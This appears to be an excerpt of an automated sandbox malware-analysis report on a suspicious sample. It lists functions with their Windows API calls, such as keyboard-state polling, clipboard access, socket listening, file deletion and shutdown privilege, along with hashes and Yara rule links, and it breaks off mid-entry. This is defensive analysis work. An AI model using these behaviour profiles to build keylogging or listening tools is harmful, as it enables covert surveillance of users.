                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 1724414362-0
                                                              • Opcode ID: 5df0f647d61c14a08bf25573f9023f66fe77a698abf6e36ad657de7376410893
                                                              • Instruction ID: f0685776b061da3febb4d5759a9ab82e159331f6864d6f996855a4051f4b1c00
                                                              • Opcode Fuzzy Hash: 5df0f647d61c14a08bf25573f9023f66fe77a698abf6e36ad657de7376410893
                                                              • Instruction Fuzzy Hash: 9CE16F71214210AFCB14EF29C881E6FBBE4EF89714B04886EF449D72A2DB34ED45CB55
                                                              Function 00460219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00460241
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 004602C2
                                                              • GetKeyState.USER32(000000A0), ref: 004602DD
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004602F7
                                                              • GetKeyState.USER32(000000A1), ref: 0046030C
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00460324
                                                              • GetKeyState.USER32(00000011), ref: 00460336
                                                              • GetAsyncKeyState.USER32(00000012), ref: 0046034E
                                                              • GetKeyState.USER32(00000012), ref: 00460360
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00460378
                                                              • GetKeyState.USER32(0000005B), ref: 0046038A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: ce91828b2830721cd7fb8b4a1e78d29246c37408a82e61dcc3c1647f0e02a60d
                                                              • Instruction ID: a21790649764f5473492f6fe8ccf9153751a7a7a640c343e9e208889fd979a5a
                                                              • Opcode Fuzzy Hash: ce91828b2830721cd7fb8b4a1e78d29246c37408a82e61dcc3c1647f0e02a60d
                                                              • Instruction Fuzzy Hash: B84188345047C96EFF319A6488183A7BEA0AF11345F08449FDDC6467C2F7985DC887AB
                                                              Function 0046C9C7 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 280timefileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C9F8
                                                              • FindClose.KERNEL32(00000000), ref: 0046CA4C
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046CA71
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046CA88
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046CAAF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileTime$FindLocal$CloseFirstSystem
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3238362701-2428617273
                                                              • Opcode ID: 49a437d8fe9a8bf4d63a33d636f4e1c2e92e3908f3cbc0411c5c65e589d803a7
                                                              • Instruction ID: d2fb6e3d745381a8f06c977d24fbab6bbb709d84a093e08bb2767dfa648d5eca
                                                              • Opcode Fuzzy Hash: 49a437d8fe9a8bf4d63a33d636f4e1c2e92e3908f3cbc0411c5c65e589d803a7
                                                              • Instruction Fuzzy Hash: C8A130B1508305ABC704EF65C885DAFB7ECEF94704F40492EF585D6192EA38EE48CB66
                                                              Function 0041710E Relevance: 15.1, Strings: 8, Instructions: 5093COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0wK$DEFINE$OaA$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                              • API String ID: 0-14353891
                                                              • Opcode ID: ce09b7ae3f1f3eb577794364a1e258ca6c0e99c45195fa8c790f52c04ac44792
                                                              • Instruction ID: 0f2016292ce7af36af0f0c3c89fa088be26185f2ba7aa12bc90a9d7b287e4a4c
                                                              • Opcode Fuzzy Hash: ce09b7ae3f1f3eb577794364a1e258ca6c0e99c45195fa8c790f52c04ac44792
                                                              • Instruction Fuzzy Hash: 2C93A371A002199BDB24CF58C8817EEB7B1FF48715F24816BED45AB381E7789D86CB48
                                                              Function 00463A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                                • Part of subcall function 00464CD3: GetFileAttributesW.KERNEL32(?,00463947), ref: 00464CD4
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00463ADF
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00463B87
                                                              • MoveFileW.KERNEL32(?,?), ref: 00463B9A
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00463BB7
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00463BD9
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00463BF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: 81d8c034fe6a70fe18044bc73a0db0305556ffc00dcb03131ab3ab8b8c2de28d
                                                              • Instruction ID: a30d93a31dc78191619e65fc742f137fc1fb73af94d3b3548b22cf7447f1242d
                                                              • Opcode Fuzzy Hash: 81d8c034fe6a70fe18044bc73a0db0305556ffc00dcb03131ab3ab8b8c2de28d
                                                              • Instruction Fuzzy Hash: 7D5160318011489ACF05EFA1CD929EEB774AF14305F2441AEE44177192EF396F09CBAA
                                                              Function 00474458 Relevance: 13.6, APIs: 9, Instructions: 83clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 92b3f1e62438dc7ffcc85fda8050e8ed33eaeb0d782a753d95e12b88d80d85a1
                                                              • Instruction ID: 690fdb2393ba8c455721d93383ebf00db8ed132600f70b1972c2202a928a4a2e
                                                              • Opcode Fuzzy Hash: 92b3f1e62438dc7ffcc85fda8050e8ed33eaeb0d782a753d95e12b88d80d85a1
                                                              • Instruction Fuzzy Hash: D3216F35300210AFDB10AF65EC09B6E77A8EF44715F10846AF90AE72A2DB79AD05CB5D
                                                              Function 0046545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00458CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00458D0D
                                                                • Part of subcall function 00458CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458D3A
                                                                • Part of subcall function 00458CC3: GetLastError.KERNEL32 ref: 00458D47
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 0046549B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 579dbc82c3cff657937c2cc6ad355f0a8cb18a3333d1a6a54e1d22e8bff13c30
                                                              • Instruction ID: 2a911ff1966252bbcdf17bf9cb72554efa01d6bf79280483f84be4285ba15f08
                                                              • Opcode Fuzzy Hash: 579dbc82c3cff657937c2cc6ad355f0a8cb18a3333d1a6a54e1d22e8bff13c30
                                                              • Instruction Fuzzy Hash: E3014C71654A012AE7285774DC4ABBB7258EB04343F2406BBFC06D21C3FD5D0C84429F
                                                              Function 00476596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004765EF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004765FE
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 0047661A
                                                              • listen.WSOCK32(00000000,00000005), ref: 00476629
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476643
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476657
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: aac7b1a6e461488d35280cc6e2b63497f567ac7a2cb6f5e78181c7989b7b377c
                                                              • Instruction ID: e6b78beff1e5acf3df9dda2c3f3869440f41808fdec0f88b9f2d9ee8019ed42f
                                                              • Opcode Fuzzy Hash: aac7b1a6e461488d35280cc6e2b63497f567ac7a2cb6f5e78181c7989b7b377c
                                                              • Instruction Fuzzy Hash: B121D0306006009FDB10EF24C849B6EB7AAEF44324F15856EE95AE73D2CB38AD05CB59
                                                              Function 0046F65E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F6AB
                                                              • Sleep.KERNEL32(0000000A), ref: 0046F6DB
                                                              • FindNextFileW.KERNEL32(?,?), ref: 0046F7A8
                                                              • FindClose.KERNEL32(00000000), ref: 0046F7BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNextSleep
                                                              • String ID: *.*
                                                              • API String ID: 1749430636-438819550
                                                              • Opcode ID: 7f7906b57c2184eb0cff65b52cca1189d7c69b65901d707bcfc5dca5b105bda5
                                                              • Instruction ID: 4cb3e628fd59122d35bce209c976cda9c2681000f87fc18f1c9b87d69f855452
                                                              • Opcode Fuzzy Hash: 7f7906b57c2184eb0cff65b52cca1189d7c69b65901d707bcfc5dca5b105bda5
                                                              • Instruction Fuzzy Hash: 7841927190020A9FCF10DF64DC45AEEBBB4FF05315F14456BE855A3290EB389E48CB99
                                                              Function 00414140 Relevance: 8.6, Strings: 6, Instructions: 1132COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$OaA$VUUU$VUUU$VUUU$VUUU
                                                              • API String ID: 0-1355328534
                                                              • Opcode ID: 6000303c6950a329683c880c1145399cc16b7f655a195cb1113640f1e615aa68
                                                              • Instruction ID: 6242274f721e4a59e2fa50c8efdb8485b3827c7e0e8d5ef51824f8c79f5bebce
                                                              • Opcode Fuzzy Hash: 6000303c6950a329683c880c1145399cc16b7f655a195cb1113640f1e615aa68
                                                              • Instruction Fuzzy Hash: 5DA27E74E0421A8BEF24CF58C9907EEB7B1BB95314F1481ABD855A7380D7389EC6CB49
                                                              Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                              • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              • Opcode ID: b8edf29c0d695a1c275d32316306b2180ebc86198bca698258bcbce8654cd126
                                                              • Instruction ID: 7331066d687c79144e479fa77cb5b53127ed0084e9ebbd02b0941197b1da37a7
                                                              • Opcode Fuzzy Hash: b8edf29c0d695a1c275d32316306b2180ebc86198bca698258bcbce8654cd126
                                                              • Instruction Fuzzy Hash: D9A13670202444BAE639AA6A4C88E7F355CDB85345F14453FF502F62F2CA3C9D0296BE
                                                              Function 00476A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004780CB
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00476AB1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476ADA
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00476B13
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476B20
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00476B34
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              • Opcode ID: 8ff4a25cdce3a3fd69f90685541766784d6adaa8d918900b62d8163675aec4b5
                                                              • Instruction ID: ec8af1d64da596956c433e57632250cf5df23c9f0dad71f231007fc3493b681d
                                                              • Opcode Fuzzy Hash: 8ff4a25cdce3a3fd69f90685541766784d6adaa8d918900b62d8163675aec4b5
                                                              • Instruction Fuzzy Hash: 7A41D371700610AFEB10AF29CC86F6E77A59B44714F04806EF94ABB3C3CB786D008B99
                                                              Function 004855FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 21e4dfcebaa746f194821cf4b74dac9dd0b2a1a6a04e49b2a13d110fbc93a992
                                                              • Instruction ID: cb23e866adfd6052c9791da1087048ad0a2fbc158b2104f0e12b7289e4a8d3fd
                                                              • Opcode Fuzzy Hash: 21e4dfcebaa746f194821cf4b74dac9dd0b2a1a6a04e49b2a13d110fbc93a992
                                                              • Instruction Fuzzy Hash: 1911B6713005116FE7112F26DC44B2F7799EF54721B81483EE80AE7241DB389D028B9D
                                                              Function 0046C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0046C69D
                                                              • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C6B5
                                                              • CoUninitialize.OLE32 ref: 0046C922
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              • Opcode ID: b736c20db89e7d29b014a91c5815dabc68ff2a063cd86e8e85ec22093a94764f
                                                              • Instruction ID: 59dbffdf9d75c8959dca0f7b229faa5ec1329e1f3517e1548e1d9fe2393bc20f
                                                              • Opcode Fuzzy Hash: b736c20db89e7d29b014a91c5815dabc68ff2a063cd86e8e85ec22093a94764f
                                                              • Instruction Fuzzy Hash: BDA13E71204205AFD704EF55C881EABB7E8EF98308F00492EF556A71D2EB74EE49CB56
                                                              Function 0047C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00441D88,?), ref: 0047C312
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0047C324
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              • Opcode ID: 8f6b8fbc5ae0276c8692dd60ba773bbd6744e56ae64103a06af9cbd1890bf6c2
                                                              • Instruction ID: 448837d343b809a7a747f76761528a7c57238ea74050f81ad14c4a4b07cc8ac9
                                                              • Opcode Fuzzy Hash: 8f6b8fbc5ae0276c8692dd60ba773bbd6744e56ae64103a06af9cbd1890bf6c2
                                                              • Instruction Fuzzy Hash: FFE08C70200303CFCB205F25C848B8B76D4EB08714B90C83FE899C2310E778D880CBA8
                                                              Function 0047F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0047F151
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0047F15F
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0047F21F
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047F22E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 420147892-0
                                                              • Opcode ID: dc482db08bc8093a5c39be90bb1d4e2e14da5ffe03d53c7d9156c7520569bfc1
                                                              • Instruction ID: a37f8fe04dce5febef69a0a0e80080e31aa126a280dd6e9744eb1fad4ec9a2d0
                                                              • Opcode Fuzzy Hash: dc482db08bc8093a5c39be90bb1d4e2e14da5ffe03d53c7d9156c7520569bfc1
                                                              • Instruction Fuzzy Hash: 66516F715043009FD310EF25DC85EABBBE8FF98714F50482EF59597292EB74A908CB96
                                                              Function 004350D7 Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0043510B
